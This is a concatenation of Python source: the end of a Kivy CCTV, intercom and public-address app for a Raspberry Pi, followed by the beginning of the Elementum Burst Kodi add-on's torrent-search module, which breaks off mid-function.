self.camara9.bind(on_press=partial(self.camara_zoom,self.camara9.nombre,self.camara9.url))
self.camaras_9on()
def camaras_4on(self,*args):
self.camara1.start()
self.camara2.start()
self.camara3.start()
self.camara4.start()
def camaras_9on(self,*args):
self.camara1.start()
self.camara2.start()
self.camara3.start()
self.camara4.start()
self.camara5.start()
self.camara6.start()
self.camara7.start()
self.camara8.start()
self.camara9.start()
def camaras_4off(self,*args):
self.camara1.stop()
self.camara2.stop()
self.camara3.stop()
self.camara4.stop()
def camaras_9off(self,*args):
self.camara1.stop()
self.camara2.stop()
self.camara3.stop()
self.camara4.stop()
self.camara5.stop()
self.camara6.stop()
self.camara7.stop()
self.camara8.stop()
self.camara9.stop()
def camara_zoom(self,nome,url,comodin):
# cambiamos el valor de las propiedades url y nombre de la "screen" VIDEOCAMARA
self.manager.get_screen('VIDEOCAMARA').url=url
self.manager.get_screen('VIDEOCAMARA').nombre=nome
self.manager.current='VIDEOCAMARA'
def graba(self,*args):
pass
def animate(self, instance):
# creamos un obxeto animado. Este obxeto pode ser empregado
# en calquera widget
# += e secuencial, mentras que &= executase en paralelo
if self.ocultar_menu:
animation = Animation(size_hint=(0.3, 1), t='out_expo')
self.ocultar_menu=False
else:
animation = Animation(size_hint=(0, 1), t='out_expo')
self.ocultar_menu=True
animation.start(instance)
Builder.load_string("""
<ImageButton@ButtonBehavior+Image>
allow_stretch: False
pos_hint: {'center_x': 0.1, 'center_y': 0.5}
size: self.texture_size
<Cctv_screen>:
canvas.before:
Rectangle:
pos: self.pos
size: self.size
source:'./imaxes/fondo12.png'
BoxLayout:
id:camaras
orientation: 'vertical'
##spacing: 5
BoxLayout:
size_hint:1,0.08
orientation: 'vertical'
canvas.before:
Color:
rgba:0.1,0.1,0.1,0.5
Rectangle:
pos: self.pos
size: self.size
BoxLayout:
id:botones
orientation:'horizontal'
size_hint:0.3,0.2
pos_hint:{'right': 1}
ImageButton:
size_hint_y:0.7
opacity:0.8
source:'./imaxes/cctv4_white.png'## if self.state=="down" else 'playlist_add_black.png'
on_press: root.numero_de_camaras=4
ImageButton:
size_hint_y:0.7
opacity:0.8
source:'./imaxes/cctv9_white.png'## if self.state=="down" else 'playlist_add_black.png'
on_press: root.numero_de_camaras=9
ImageButton:
size_hint_y:0.7
opacity:0.6
source:'./imaxes/casa_white.png'## if self.state=="down" else 'playlist_add_black.png'
on_press: root.manager.current='OLLOSIP'#root.cambio()
ImageButton:
opacity:0.6
source:'./imaxes/menu_white.png'## if self.state=="down" else 'playlist_add_black.png'
#neste punto chammos o menu de configuracion das opcions das camaras(pendente de desenrolo)
#on_press: root.animate(root.ids.menu)
GridLayout:
id:camarascctv
size_hint_y:0.9
cols:2
row:2
disabled:False if root.ocultar_menu==True else True
#comprobamos si o menu desplegable esta activado, si e asi bloqueamos
#todos os widgets que colgan desta capa gridlayout
BoxLayout:
id:menu
orientation:'vertical'
size_hint:0,1
canvas.before:
Color:
rgba:0.1,0.1,0.05,0.7
Rectangle:
pos: self.pos
size: self.size
ScrollView:
BoxLayout:
size_hint:1,None#dp(10) ##separacion en pixeles entre os elementos que componen o menu
size:100,10
height:800
orientation:'vertical'
ImageButton:
size_hint:0.3,1
opacity:0.6
source:'./imaxes/cctv.png'## if self.state=="down" else 'playlist_add_black.png'
#funcion pendente de desenrolo
#on_press: root.graba(self)
Label:
text:'pruebas'
ImageButton:
size_hint:0.3,1
opacity:0.6
source:'./imaxes/cctv.png'## if self.state=="down" else 'playlist_add_black.png'
#funcion pendente de desenrolo
#on_press: root.graba(self)
ImageButton:
size_hint:0.3,1
opacity:0.6
source:'./imaxes/cctv.png'## if self.state=="down" else 'playlist_add_black.png'
#funcion pendente de desenrolo
#on_press: root.graba(self)
ImageButton:
size_hint:0.3,1
opacity:0.6
source:'./imaxes/cctv.png'## if self.state=="down" else 'playlist_add_black.png'
#funcion pendente de desenrolo
#on_press: root.graba(self)
ImageButton:
size_hint:0.3,1
opacity:0.6
source:'./imaxes/cctv.png'## if self.state=="down" else 'playlist_add_black.png'
#funcion pendente de desenrolo
#on_press: root.graba(self)
""")
class Principal_screen(Screen):
def __init__(self, **kwargs):
#con super heredamos de la clase screen todos los atributos de esta
super( Principal_screen, self).__init__(**kwargs)
SCREEN_ACTIVA= 'OLLOSIP'
self.size=(800,480)
self.imagenfondo = Image(source=str(PATH)+'fondo5.jpg')
capa_fondo=FloatLayout(size_hint=(1,1))
capa_botones= FloatLayout(size_hint=(None,None),size=(800, 460),pos=(0,0))
capa_info=RelativeLayout(size_hint=(None,None),size=(800, 40),pos=(0,440))
with capa_info.canvas.before:
Color(0,0,1,1)
rect = Rectangle(size=capa_info.size, pos=capa_info.pos)
capa_test=BoxLayout(size_hint=(None,None),size=(200,20),pos=(0,19))
b1=Button(size_hint=(0.5,1),text='B1')
b2=Button(size_hint=(0.5,1),text='B2')
capa_test.add_widget(b1)
capa_test.add_widget(b2)
capa_test2=BoxLayout(size_hint=(None,None),size=(200,20))
b3=Button(size_hint=(0.5,1),text='B3')
b4=Button(size_hint=(0.5,1),text='B4')
capa_test2.add_widget(b3)
capa_test2.add_widget(b4)
reloj=DigitalClock(size_hint_x=0.3, pos=(510,0),font_size=34, style='cool', halign='right', valign='middle')
boton_settings= IconButton(pos=(760,0),imagen=str(PATH)+'menu_white.png',size=(40,40))
boton_megafonia= IconButton(pos=(50,120),imagen=str(PATH)+'megafonia90.png',texto='MEGAFONIA' ,size=(140,140))
boton_cctv= IconButton(pos=(320,220),imagen=str(PATH)+'cctv90.png',texto='CCTV' ,size=(140,140))
boton_videoip= IconButton(pos=(610,120),imagen=str(PATH)+'porteroip90.png',texto='VIDEOIP' ,size=(140,140))
#OJO SI EL NOMBRE DE LA IMAGEN
#OJO SI EL NOMBRE DE LA IMAGEN
#EMPIEZA POR V DA ERROR AL LEERLA, HABRa QUE ESTUDIAR EL PORQUe
capa_botones.add_widget(boton_videoip)
capa_botones.add_widget(boton_megafonia)
capa_botones.add_widget(boton_cctv)
capa_info.add_widget(boton_settings)
capa_info.add_widget(reloj)
capa_fondo.opacity=1
capa_botones.opacity=1
capa_info.opacity=1
capa_fondo.add_widget(self.imagenfondo)
capa_fondo.add_widget(capa_info)
capa_fondo.add_widget(capa_botones)
self.add_widget(capa_fondo)
boton_cctv.bind(on_release=self.cambiocctv)
boton_megafonia.bind(on_release=self.cambiomegafonia)
boton_videoip.bind(on_release=self.cambiovideoportero)
boton_settings.bind(on_press=self.configuracion)
def configuracion (self,*args):
config = ConfigParser()
config.read('ollosip.ini')
self.configuracion =SettingsWithSidebar()# Settings()
self.configuracion.add_json_panel('Configuracion Ollosip', config, 'settings_ollosip.json')
self.add_widget(self.configuracion)
self.configuracion.bind(on_close=self.cerrarconfig)
self.configuracion.bind(on_config_change=self.configcambio)
# debemos introcucir como parametro none al ser llamado desde el evento on_cofig_change
def configcambio(self,config,none,section,key,value):
global MIEXTENSION
global MIEXTENSIONP
global IPCENTRALITA
# si fuese redefinido y utilizado dentro del metodo App sobraria
#print("Config: %s / %s -> %s" % (section, key, value))
if (section == "sistema"):
if key=='ip':
self.cambia_ip_sistema(value)
if (section == "sistema"):
if key=='pe':
self.cambia_gateway_sistema(value)
if (section == "terminal"):
if key=='extension':
MIEXTENSION=value
telefono1.configure_sip_account(str(MIEXTENSION), str(MIEXTENSIONP))
#print(value)
if key=='clave':
MIEXTENSIONP=str(value)
#telefono1.start()
if key=='ipbx':
IPCENTRALITA=str(value)
telefono1.configure_sip_account(username=str(MIEXTENSION), password=str(MIEXTENSIONP))
#print(value)
def cambia_ip_sistema(self,value,*args):
#Este metodo nos permite cambiar la ip del sistema editando el fichero de la rpi dhcpcd.conf
#recibe como parametro la ip modificada desde la pantalla de configuracion
indice=0
texto="inform"
nuevotexto="inform "+str(value)+"\n"
#print (value)
x=fileinput.input(files="/etc/dhcpcd.conf", inplace=1)
for line in x:
if texto in line:
line=nuevotexto
print line,
x.close
os.system("sudo ifconfig wlan0 down")
os.system("sudo ifconfig wlan0 up")
os.system("sudo ifconfig eth0 down")
os.system("sudo ifconfig eth0 up")
def cambia_gateway_sistema(self,value,*args):
#Este metodo nos permite cambiar la ip del sistema editando el fichero de la rpi dhcpcd.conf
#recibe como parametro la ip modificada desde la pantalla de configuracion
indice=0
texto="static routers="
#print (value)
nuevotexto="static routers="+str(value)+"\n"
x=fileinput.input(files="/etc/dhcpcd.conf", inplace=1)
for line in x:
if texto in line:
line=nuevotexto
print line,
x.close
os.system("sudo ifconfig wlan0 down")
os.system("sudo ifconfig wlan0 up")
def cerrarconfig(self,*args):
self.remove_widget(self.configuracion)
def cambiovideoportero(self,*args):
self.manager.current = 'VIDEOIP' #se va a la screen con nombre MUSICA
SCREEN_ACTIVA= 'VIDEOIP'
def cambiomegafonia(self,*args):
self.manager.current = 'MEGAFONIA' #se va a la screen con nombre MUSICA
SCREEN_ACTIVA= 'MEGAFONIA'
def cambiocctv(self,*args):
self.manager.current = 'CCTV' #se va a la screen con nombre VIDEOTELEFONO
SCREEN_ACTIVA= 'CCTV'
class Rectangulo(Widget):
ancho=NumericProperty(1)
color=ListProperty([1,1,1,1])
Builder.load_string("""
<Rectangulo>:
canvas:
Color:
rgba:root.color
Line:
width:root.ancho
#rectangle: (self.x-10,self.y-10,self.width+10,self.height+40)
rectangle: (self.x,self.y,self.width,self.height)
""")
class Megafonia_screen(Screen):
ocultar_volumen=BooleanProperty(True)
animando=BooleanProperty(False)
def __init__(self, **kwargs):
#con super heredamos de la clase screen todos los atributos de esta
super( Megafonia_screen, self).__init__(**kwargs)
self.interr=BooleanProperty(False)
#self.ipcamara1="192.168.0.17"
def actualiza_volumen_microfono(self,valor):
telefono1.core.mic_gain_db=valor
def activa_microfono(self,*args):
EXTENSION=0
#llamada general a todos los altavoces
if self.ids.E5.state=="down":
EXTENSION=6060
elif self.ids.E4.state=="down":
EXTENSION=6064
elif self.ids.E3.state=="down":
EXTENSION=6063
elif self.ids.E2.state=="down":
EXTENSION=6031
elif self.ids.E1.state=="down":
EXTENSION=6030
#logging.info('%s', EXTENSION)
if self.ids.microfono.state=="down":
telefono1.llamar(EXTENSION)
else:
telefono1.colgar()
# este metodo es llamado cada vez que SALIMOS en esta pantalla FORMA PARTE
#DE LOS METODOS DEL SCREEN MAGAGER
def on_leave(self):
#NOS ASEGURAMOS DE APAGAR EL MICROFONO EN EL CASO DE SALIR DE LA PANTALLA
self.ids.microfono.state="normal"
self.ids.microfono.parpadeo=False
self.animando=True
self.animate(self.ids.altofalantes)
self.ids.microfono.flash(self.ids.activado)
telefono1.colgar()
def anima_volumen(self, instance):
# creamos un obxeto animado. Este obxeto pode ser empregado
# en calquera widget
# += e secuencial, mentras que &= executase en paralelo
if self.ocultar_volumen:
animation = Animation(opacity=1,duration=0.9,t='out_quad')
self.ocultar_volumen=False
else:
animation = Animation(opacity=0,duration=0.6, t='out_quad')
self.ocultar_volumen=True
animation.start(instance)
# creamos un obxeto animado. Este obxeto pode ser empregado
# en calquera widget
# += e secuencial, mentras que &= executase en paralelo
def animate(self, instance):
animation = Animation(opacity=1,duration=0.2,t='out_quad')
animation+= Animation(opacity=0,duration=0.2, t='out_quad')
#animation.repeat=True
if self.animando==False:
animation.repeat=True
animation.start(instance)
self.animando=True
else:
self.animando=False
instance.opacity=0
animation.cancel_all(instance)
Builder.load_string("""
<ImageButton@ButtonBehavior+Image>
allow_stretch: False
#pos_hint: {'center_x': 0.1, 'center_y': 0.5}
#size: self.texture_size
<BotonLed2@ToggleButton+Image>:
#pos_hint: {'center_x': 0.4, 'center_y': 0.5}
font_size:self.width*0.1
text_size:self.size
valihaling:'left'
text:self.text
#size: self.texture_size
<Megafonia_screen>:
on_leave:self.ids.microfono.flash(root.ids.activado)
canvas.before:
Rectangle:
pos: self.pos
size: self.size
source:'./imaxes/fondo32.png'
BoxLayout:
id:camaras
size_hint:1,1
orientation: 'vertical'
BoxLayout:
size_hint:1,0.1
orientation: 'vertical'
canvas.before:
Color:
rgba:0.1,0.1,0.1,0.8
Rectangle:
pos: self.pos
size: self.size
BoxLayout:
id:botones
orientation:'horizontal'
#fijamos el tamano de la box en x e y, es el espacio que dejamos para los botones
size_hint:0.28,1
pos_hint:{'right': 1.03}
DigitalClock:
font_size:self.width*0.25
style:'cool'
valign:'middle'
ImageButton:
size_hint_y:0.6
opacity:0.6
source:'./imaxes/casa_white.png'
on_press: root.manager.current='OLLOSIP'
ImageButton:
opacity:0.6
source:'./imaxes/menu_white.png'
#on_press: root.animate(root.ids.menu)
BoxLayout:
orientation:'horizontal'
size_hint:1,1
FloatLayout:
#pos_hint:{'center_x': 0.8,'center_y':0.5}
orientation:'vertical'
size_hint:0.1,0.8
Label:
id:altofalantes
opacity:0
markup:True
pos_hint:{'x': 1.6,'center_y':1.2}
font_size:self.width*0.4
text:'Altofalantes activados'
VolumenRect:
id:volumen
size_hint:0.4,0.9
pos_hint:{'center_x': 0.5,'center_y':0.65}
imagen:'./imaxes/mic_white.png'
opacity:0
color: (1, 1, 1, 0.9)
maximo: 15
on_valor:root.actualiza_volumen_microfono(self.valor)
BoxLayout:
size_hint:1,0.2
pos_hint:{'center_y':0.1,'center_x':0.5}
ImageButton:
pos:root.pos
size_hint:0.15,0.35
source:'./imaxes/mic_white.png'
on_press:root.anima_volumen(root.ids.volumen)
AnchorLayout:
orientation:'vertical'
size_hint:0.6,0.6
pos_hint:{'center_x': 0.5,'center_y':0.5}
BotonColour:
id:microfono
size_hint:0.6,0.6
pos_hint:self.pos_hint
opacity:1
source:'./imaxes/mic1.png'
on_press: root.activa_microfono(),self.flash(root.ids.activado),root.animate(root.ids.altofalantes)
Rectangulo:
id:activado
ancho:3
color:1,1,1,1
size_hint:0.6,0.7
pos_hint:self.pos_hint
BoxLayout:
orientation:'vertical'
size_hint:0.2,1
pos_hint:self.pos_hint
BotonLed2:
id:E5
source:'./imaxes/megafonoverde24.png'
text:'TODAS AS ZONAS'
opacity:0.4
group:'zona'
BoxLayout:
orientation:'vertical'
size_hint:0.3,1
pos_hint:self.pos_hint
BotonLed2:
id:E1
source:'./imaxes/megafonoverde24.png'
text:'ZONA1'
opacity:0.3
#group:'zona'
#on_press:root.activa_microfono()
BotonLed2:
id:E2
#size_hint_y:0.2
source:'./imaxes/megafonoverde24.png'
text:'ZONA2'
opacity:0.3
#group:'zona'
BotonLed2:
id:E3
#size_hint_y:0.2
source:'./imaxes/megafonoverde24.png'
text:'ZONA3'
opacity:0.3
#group:'zona'
BotonLed2:
id:E4
#size_hint_y:0.2
source:'./imaxes/megafonoverde24.png'
text:'ZONA4'
opacity:0.3
#group:'zona'
""")
telefono1 = Phone(username=str(MIEXTENSION), password=str(MIEXTENSIONP), camera='', snd_capture='')
# =================
# Aplicacion principal App
# =================
class OllosipApp(App):
def build(self):
self.sm = ScreenManager()
self.sm.transition=FadeTransition()#RiseInTransition()
self.sm.add_widget(Principal_screen(name='OLLOSIP'))
self.sm.add_widget(Cctv_screen(name='CCTV'))
self.sm.add_widget(Videoportero_screen(name='VIDEOIP'))
self.sm.add_widget(Megafonia_screen(name='MEGAFONIA'))
self.sm.add_widget(Camara_screen(name='VIDEOCAMARA'))
self.sm.current = "OLLOSIP"
#empleamos el evento creado on_registrar en la clase Phone
telefono1.bind(on_llamada_entrante=self.llamada_entrando)
return self.sm
def llamada_entrando(self,*args):
if llamada_extension==EXT_VIDEOPORTERO:
self.sm.current = "VIDEOIP"
if __name__ == '__main__':
OllosipApp().run()
|
burst.py | # -*- coding: utf-8 -*-
"""
Burst processing thread
"""
import re
import json
import time
import xbmc
import xbmcaddon
import xbmcgui
from Queue import Queue
from threading import Thread
from urlparse import urlparse
from urllib import unquote
from elementum.provider import append_headers, get_setting, log
from parser.ehp import Html
from provider import process
from providers.definitions import definitions, longest
from filtering import apply_filters, Filtering
from client import USER_AGENT, Client
from utils import ADDON_ICON, notify, translation, sizeof, get_icon_path, get_enabled_providers, get_alias
provider_names = []
provider_results = []
available_providers = 0
request_time = time.time()
auto_timeout = get_setting("auto_timeout", bool)
timeout = get_setting("timeout", int)
special_chars = "()\"':.[]<>/\\?"
if auto_timeout:
elementum_addon = xbmcaddon.Addon(id='plugin.video.elementum')
if elementum_addon:
if elementum_addon.getSetting('custom_provider_timeout_enabled') == "true":
timeout = int(elementum_addon.getSetting('custom_provider_timeout'))
else:
timeout = 28
log.debug("Using timeout from Elementum: %d seconds" % (timeout))
def search(payload, method="general"):
""" Main search entrypoint
Args:
payload (dict): Search payload from Elementum.
method (str): Type of search, can be ``general``, ``movie``, ``show``, ``season`` or ``anime``
Returns:
list: All filtered results in the format Elementum expects
"""
log.debug("Searching with payload (%s): %s" % (method, repr(payload)))
if method == 'general':
if 'query' in payload:
payload['title'] = payload['query']
payload['titles'] = {
'source': payload['query']
}
else:
payload = {
'title': payload,
'titles': {
'source': payload
},
}
payload['titles'] = dict((k.lower(), v) for k, v in payload['titles'].iteritems())
# If titles[] exists in payload and there are special chars in titles[source]
# then we set a flag to possibly modify the search query
payload['has_special'] = 'titles' in payload and \
bool(payload['titles']) and \
'source' in payload['titles'] and \
any(c in payload['titles']['source'] for c in special_chars)
if payload['has_special']:
log.debug("Query title contains special chars, so removing any quotes in the search query")
if 'proxy_url' not in payload:
payload['proxy_url'] = ''
global request_time
global provider_names
global provider_results
global available_providers
provider_names = []
provider_results = []
available_providers = 0
request_time = time.time()
providers = get_enabled_providers(method)
if len(providers) == 0:
notify(translation(32060), image=get_icon_path())
log.error("No providers enabled")
return []
log.info("Burstin' with %s" % ", ".join([definitions[provider]['name'] for provider in providers]))
# if get_setting("use_cloudhole", bool):
# clearance, user_agent = get_cloudhole_clearance(get_cloudhole_key())
# set_setting('clearance', clearance)
# set_setting('user_agent', user_agent)
if get_setting('kodi_language', bool):
kodi_language = xbmc.getLanguage(xbmc.ISO_639_1)
if not kodi_language:
log.warning("Kodi returned empty language code...")
elif 'titles' not in payload or not payload['titles']:
log.info("No translations available...")
elif payload['titles'] and kodi_language not in payload['titles']:
log.info("No '%s' translation available..." % kodi_language)
p_dialog = xbmcgui.DialogProgressBG()
p_dialog.create('Elementum [COLOR FFFF6B00]Burst[/COLOR]', translation(32061))
for provider in providers:
available_providers += 1
provider_names.append(definitions[provider]['name'])
task = Thread(target=run_provider, args=(provider, payload, method))
task.start()
providers_time = time.time()
total = float(available_providers)
# Exit if all providers have returned results or timeout reached, check every 100ms
while time.time() - providers_time < timeout and available_providers > 0:
timer = time.time() - providers_time
log.debug("Timer: %ds / %ds" % (timer, timeout))
if timer > timeout:
break
message = translation(32062) % available_providers if available_providers > 1 else translation(32063)
p_dialog.update(int((total - available_providers) / total * 100), message=message)
time.sleep(0.25)
p_dialog.close()
del p_dialog
if available_providers > 0:
message = u', '.join(provider_names)
message = message + translation(32064)
log.warning(message.encode('utf-8'))
notify(message, ADDON_ICON)
log.debug("all provider_results: %s" % repr(provider_results))
filtered_results = apply_filters(provider_results)
log.debug("all filtered_results: %s" % repr(filtered_results))
log.info("Providers returned %d results in %s seconds" % (len(filtered_results), round(time.time() - request_time, 2)))
return filtered_results
def got_results(provider, results):
""" Results callback once a provider found all its results, or not
Args:
provider (str): The provider ID
results (list): The list of results
"""
global provider_names
global provider_results
global available_providers
definition = definitions[provider]
definition = get_alias(definition, get_setting("%s_alias" % provider))
max_results = get_setting('max_results', int)
sort_by = get_setting('sort_by', int)
# 0 "Resolution"
# 1 "Seeds"
# 2 "Size"
# 3 "Balanced"
if not sort_by or sort_by == 3:
# TODO: think of something interesting to balance sort results
sorted_results = sorted(results, key=lambda r: (r['sort_balance']), reverse=True)
elif sort_by == 0:
sorted_results = sorted(results, key=lambda r: (r['sort_resolution']), reverse=True)
elif sort_by == 1:
sorted_results = sorted(results, key=lambda r: (r['seeds']), reverse=True)
elif sort_by == 2:
sorted_results = sorted(results, key=lambda r: (r['size']), reverse=True)
if len(sorted_results) > max_results:
sorted_results = sorted_results[:max_results]
log.info(">> %s returned %2d results in %.1f seconds%s" % (
definition['name'].rjust(longest), len(results), round(time.time() - request_time, 2),
(", sending %d best ones" % max_results) if len(results) > max_results else ""))
provider_results.extend(sorted_results)
available_providers -= 1
if definition['name'] in provider_names:
provider_names.remove(definition['name'])
def extract_torrents(provider, client):
""" Main torrent extraction generator for non-API based providers
Args:
provider (str): Provider ID
client (Client): Client class instance
Yields:
tuple: A torrent result
"""
definition = definitions[provider]
definition = get_alias(definition, get_setting("%s_alias" % provider))
log.debug("Extracting torrents from %s using definitions: %s" % (provider, repr(definition)))
if not client.content:
raise StopIteration
dom = Html().feed(client.content)
key_search = get_search_query(definition, "key")
row_search = get_search_query(definition, "row")
name_search = get_search_query(definition, "name")
torrent_search = get_search_query(definition, "torrent")
info_hash_search = get_search_query(definition, "infohash")
size_search = get_search_query(definition, "size")
seeds_search = get_search_query(definition, "seeds")
peers_search = get_search_query(definition, "peers")
referer_search = get_search_query(definition, "referer")
log.debug("[%s] Parser: %s" % (provider, repr(definition['parser'])))
q = Queue()
threads = []
needs_subpage = 'subpage' in definition and definition['subpage']
if needs_subpage:
def extract_subpage(q, name, torrent, size, seeds, peers, info_hash, referer):
try:
log.debug("[%s] Getting subpage at %s" % (provider, repr(torrent)))
except Exception as e:
import traceback
log.error("[%s] Subpage logging failed with: %s" % (provider, repr(e)))
map(log.debug, traceback.format_exc().split("\n"))
# New client instance, otherwise it's race conditions all over the place
subclient = Client()
subclient.passkey = client.passkey
headers = {}
if get_setting("use_cloudhole", bool):
subclient.clearance = get_setting('clearance')
subclient.user_agent = get_setting('user_agent')
if "subpage_mode" in definition:
if definition["subpage_mode"] == "xhr":
headers['X-Requested-With'] = 'XMLHttpRequest'
headers['Content-Language'] = ''
if referer:
headers['Referer'] = referer
uri = torrent.split('|') # Split cookies for private trackers
subclient.open(uri[0].encode('utf-8'), headers=headers)
if 'bittorrent' in subclient.headers.get('content-type', ''):
log.debug('[%s] bittorrent content-type for %s' % (provider, repr(torrent)))
if len(uri) > 1: # Stick back cookies if needed
torrent = '%s|%s' % (torrent, uri[1])
else:
try:
torrent = extract_from_page(provider, subclient.content)
if torrent and not torrent.startswith('magnet') and len(uri) > 1: # Stick back cookies if needed
torrent = '%s|%s' % (torrent, uri[1])
except Exception as e:
import traceback
log.error("[%s] Subpage extraction for %s failed with: %s" % (provider, repr(uri[0]), repr(e)))
map(log.debug, traceback.format_exc().split("\n"))
ret = (name, info_hash, torrent, size, seeds, peers)
q.put_nowait(ret)
if not dom:
raise StopIteration
if get_setting("use_debug_parser", bool):
log.debug("[%s] Parser debug | Page content: %s" % (provider, client.content.replace('\r', '').replace('\n', '')))
key = eval(key_search) if key_search else ""
if key_search and get_setting("use_debug_parser", bool):
key_str = key.__str__()
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'key', key_search, key_str.replace('\r', '').replace('\n', '')))
items = eval(row_search)
if get_setting("use_debug_parser", bool):
log.debug("[%s] Parser debug | Matched %d items for '%s' query '%s'" % (provider, len(items), 'row', row_search))
for item in items:
if get_setting("use_debug_parser", bool):
item_str = item.__str__()
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'row', row_search, item_str.replace('\r', '').replace('\n', '')))
if not item:
continue
name = eval(name_search) if name_search else ""
torrent = eval(torrent_search) if torrent_search else ""
size = eval(size_search) if size_search else ""
seeds = eval(seeds_search) if seeds_search else ""
peers = eval(peers_search) if peers_search else ""
info_hash = eval(info_hash_search) if info_hash_search else ""
referer = eval(referer_search) if referer_search else ""
if 'magnet:?' in torrent:
torrent = torrent[torrent.find('magnet:?'):]
if get_setting("use_debug_parser", bool):
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'name', name_search, name))
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'torrent', torrent_search, torrent))
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'size', size_search, size))
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'seeds', seeds_search, seeds))
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'peers', peers_search, peers))
if info_hash_search:
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'info_hash', info_hash_search, info_hash))
if referer_search:
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'info_hash', referer_search, referer))
# Pass client cookies with torrent if private
if (definition['private'] or get_setting("use_cloudhole", bool)) and not torrent.startswith('magnet'):
user_agent = USER_AGENT
if get_setting("use_cloudhole", bool):
user_agent = get_setting("user_agent")
if client.passkey:
torrent = torrent.replace('PASSKEY', client.passkey)
elif client.token:
headers = {'Authorization': client.token, 'User-Agent': user_agent}
log.debug("[%s] Appending headers: %s" % (provider, repr(headers)))
torrent = append_headers(torrent, headers)
log.debug("[%s] Torrent with headers: %s" % (provider, repr(torrent)))
else:
log.debug("[%s] Cookies: %s" % (provider, repr(client.cookies())))
parsed_url = urlparse(definition['root_url'])
cookie_domain = '{uri.netloc}'.format(uri=parsed_url).replace('www.', '')
cookies = []
for cookie in client._cookies:
if cookie_domain in cookie.domain:
cookies.append(cookie)
if cookies:
headers = {'Cookie': ";".join(["%s=%s" % (c.name, c.value) for c in cookies]), 'User-Agent': user_agent}
if client.request_headers:
headers.update(client.request_headers)
if client.url:
headers['Referer'] = client.url
headers['Origin'] = client.url
torrent = append_headers(torrent, headers)
if name and torrent and needs_subpage and not torrent.startswith('magnet'):
if not torrent.startswith('http'):
torrent = definition['root_url'] + torrent.encode('utf-8')
t = Thread(target=extract_subpage, args=(q, name, torrent, size, seeds, peers, info_hash, referer))
threads.append(t)
else:
yield (name, info_hash, torrent, size, seeds, peers)
if needs_subpage:
log.debug("[%s] Starting subpage threads..." % provider)
for t in threads:
t.start()
for t in threads:
t.join()
log.debug("[%s] Threads returned: %s" % (provider, repr(threads)))
for i in range(q.qsize()):
ret = q.get_nowait()
log.debug("[%s] Queue %d got: %s" % (provider, i, repr(ret)))
yield ret
def extract_from_api(provider, client):
""" Main API parsing generator for API-based providers
An almost clever API parser, mostly just for YTS, RARBG and T411
Args:
provider (str): Provider ID
client (Client): Client class instance
Yields:
tuple: A torrent result
"""
try:
data = json.loads(client.content)
except:
data = []
log.debug("[%s] JSON response from API: %s" % (unquote(provider), repr(data)))
definition = definitions[provider]
definition = get_alias(definition, get_setting("%s_alias" % provider))
api_format = definition['api_format']
results = []
result_keys = api_format['results'].split('.')
log.debug("%s result_keys: %s" % (provider, repr(result_keys)))
for key in result_keys:
if key in data:
data = data[key]
else:
data = []
# log.debug("%s nested results: %s" % (provider, repr(data)))
results = data
log.debug("%s results: %s" % (provider, repr(results)))
if 'subresults' in api_format:
from copy import deepcopy
for result in results: # A little too specific to YTS but who cares...
result['name'] = result[api_format['name']]
subresults = []
subresults_keys = api_format['subresults'].split('.')
for key in subresults_keys:
for result in results:
if key in result:
for subresult in result[key]:
sub = deepcopy(result)
sub.update(subresult)
subresults.append(sub)
results = subresults
log.debug("%s with subresults: %s" % (provider, repr(results)))
for result in results:
if not result or not isinstance(result, dict):
continue
name = ''
info_hash = ''
torrent = ''
size = ''
seeds = ''
peers = ''
if 'name' in api_format:
name = result[api_format['name']]
if 'torrent' in api_format:
torrent = result[api_format['torrent']]
if 'download_path' in definition:
torrent = definition['base_url'] + definition['download_path'] + torrent
if client.token:
user_agent = USER_AGENT
if get_setting("use_cloudhole", bool):
user_agent = get_setting("user_agent")
headers = {'Authorization': client.token, 'User-Agent': user_agent}
log.debug("[%s] Appending headers: %s" % (provider, repr(headers)))
torrent = append_headers(torrent, headers)
log.debug("[%s] Torrent with headers: %s" % (provider, repr(torrent)))
if 'info_hash' in api_format:
info_hash = result[api_format['info_hash']]
if 'quality' in api_format: # Again quite specific to YTS...
name = "%s - %s" % (name, result[api_format['quality']])
if 'size' in api_format:
size = result[api_format['size']]
if type(size) in (long, int):
size = sizeof(size)
elif type(size) in (str, unicode) and size.isdigit():
size = sizeof(int(size))
if 'seeds' in api_format:
seeds = result[api_format['seeds']]
if type(seeds) in (str, unicode) and seeds.isdigit():
seeds = int(seeds)
if 'peers' in api_format:
peers = result[api_format['peers']]
if type(peers) in (str, unicode) and peers.isdigit():
peers = int(peers)
yield (name, info_hash, torrent, size, seeds, peers)
def extract_from_page(provider, content):
""" Sub-page extraction method
Args:
provider (str): Provider ID
content (str): Page content from Client instance
Returns:
str: Torrent or magnet link extracted from sub-page
"""
definition = definitions[provider]
definition = get_alias(definition, get_setting("%s_alias" % provider))
try:
matches = re.findall(r'magnet:\?[^\'"\s<>\[\]]+', content)
if matches:
result = matches[0]
log.debug('[%s] Matched magnet link: %s' % (provider, repr(result)))
return result
matches = re.findall('http(.*?).torrent["\']', content)
if matches:
result = 'http' + matches[0] + '.torrent'
result = result.replace('torcache.net', 'itorrents.org')
log.debug('[%s] Matched torrent link: %s' % (provider, repr(result)))
return result
matches = re.findall('/download\?token=[A-Za-z0-9%]+', content)
if matches:
result = definition['root_url'] + matches[0]
log.debug('[%s] Matched download link with token: %s' % (provider, repr(result)))
return result
matches = re.findall('/torrents/download/\?id=[a-z0-9-_.]+', content) # t411
if matches:
result = definition['root_url'] + matches[0]
log.debug('[%s] Matched download link with an ID: %s' % (provider, repr(result)))
return result
matches = re.findall('\: ([A-Fa-f0-9]{40})', content)
if matches:
result = "magnet:?xt=urn:btih:" + matches[0]
log.debug('[%s] Matched magnet info_hash search: %s' % (provider, repr(result)))
return result
except:
pass
return None
def run_provider(provider, payload, method):
""" Provider thread entrypoint
Args:
provider (str): Provider ID
payload (dict): Search payload from Elementum
